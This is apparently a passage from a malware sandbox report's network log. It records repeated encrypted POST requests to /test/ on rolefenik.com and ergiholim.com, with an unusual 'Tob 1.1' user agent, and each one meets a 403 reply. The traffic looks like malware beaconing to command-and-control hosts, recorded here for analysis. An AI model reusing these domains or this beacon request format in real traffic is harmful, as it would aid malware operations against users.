                                                                                                                                          2024-11-13 17:23:16 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:16 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWgU9G4AQi5q94uNvw%2B4XK6ZJcqBKf1jI4j0AkqRA%2BXM8l1rM8ac7lpNzGhbJ91oSf2QcVmjN98KNw4OqeqT%2Fejp%2FTwQfdyoseRUwndK2eyUd7c5GArcFIjQfSpgcpcG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072daeebfe37e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=167898&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17512&cwnd=32&unsent_bytes=0&cid=e31ee755400a3862&ts=596&x=0"
                                                                                                                                          2024-11-13 17:23:16 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          67192.168.2.650062104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:17 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:17 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:18 UTC756INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:17 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILsKwzIq6gbDJ4%2F66sgrnxje5FIUfgW1W%2BWB8IcNF%2BiKXLMAdgDE20dGWKMfQWyMH%2FCZqP8%2B%2Bc4AVU3IPEucSHvLO5bzgobpS0wPjJqZp2QMR4JtMOz%2BxCQcUzAMepWH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072e3fc62d79c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=146570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20332&cwnd=32&unsent_bytes=0&cid=8b622a9829de32b7&ts=501&x=0"
                                                                                                                                          2024-11-13 17:23:18 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          68192.168.2.650063104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:19 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:19 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:19 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:19 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNz%2BwL5jt40WawpRVcr9nBci4YrOidndGEDRCzAEro1FUvYqV49pG5P2qf4v3eSgypbVebFdPnjs3LVTKAYi6K2Ynmk02zVeRYUbB%2BBO3FxErv1ToDJHh4rO%2BO2g7maZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072edc9a37374-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=129834&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=22287&cwnd=32&unsent_bytes=0&cid=1740d836c5f71e5f&ts=776&x=0"
                                                                                                                                          2024-11-13 17:23:19 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          69192.168.2.650064104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:20 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:20 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:21 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:21 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pswzgrdyDrsJIPX3dZ2LvrTG8xG8knbsZ5QD6m3x0cQaJM7PwZ2%2FOjnecOo1zx1BDqJGO%2BZOXy4ltUSCnbBEKY57071ar49gvf%2F3G7PXUj%2FDgTugD09g96w%2FR%2FHxJv8P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072f85989e36b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=139980&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20059&cwnd=32&unsent_bytes=0&cid=e33bb2b48837105f&ts=505&x=0"
                                                                                                                                          2024-11-13 17:23:21 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          70192.168.2.650065104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:22 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:22 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:22 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjae4mD%2BxOGAyipArYHkptJw9h%2FLNTpN88F791NgZ6QQ2ADVt%2BsjgaVXTcdMhrwRwYu3351lvFnGBYxWx9H%2BBqcxcOn5sSTjV7tOIrDk3SBBKpH%2BzdU9S5CUjF9wXRUG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20730148dcd768-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=156589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=18186&cwnd=32&unsent_bytes=0&cid=137fed4dc9920c19&ts=575&x=0"
                                                                                                                                          2024-11-13 17:23:22 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          71192.168.2.650066104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:23 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:23 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:23 UTC751INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2BJmJxP6Ps0agBrkSyQyry0%2F89gwUBxy3%2FI7dtX1kFSohIGH5r9QnfjOYbXNKKORvGnhgQhjjq%2FgbgEmAAJgE89H3kjREZTi0PJT7hf2yH4IXhKgThxt2oDhwZ3r5rpf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207308fd042c87-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2154761&cwnd=228&unsent_bytes=0&cid=9241388e304601e6&ts=394&x=0"
                                                                                                                                          2024-11-13 17:23:23 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          72192.168.2.650067104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:24 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:24 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:25 UTC745INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GT21G0dGeeA0ByYvdUGiiYKVcqVQ8kfwIikzxsJy8UANjF6ZlDVtTWnOgs84m%2F8LKvWvgYk%2FkETiHhtnlJA6kOzEeNRloLBilIX5QEEmB6nwikz3K1g64qzxWe4OdTSr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073107dcbc971-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=39825&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=72679&cwnd=32&unsent_bytes=0&cid=03bb5b8cf26572a9&ts=486&x=0"
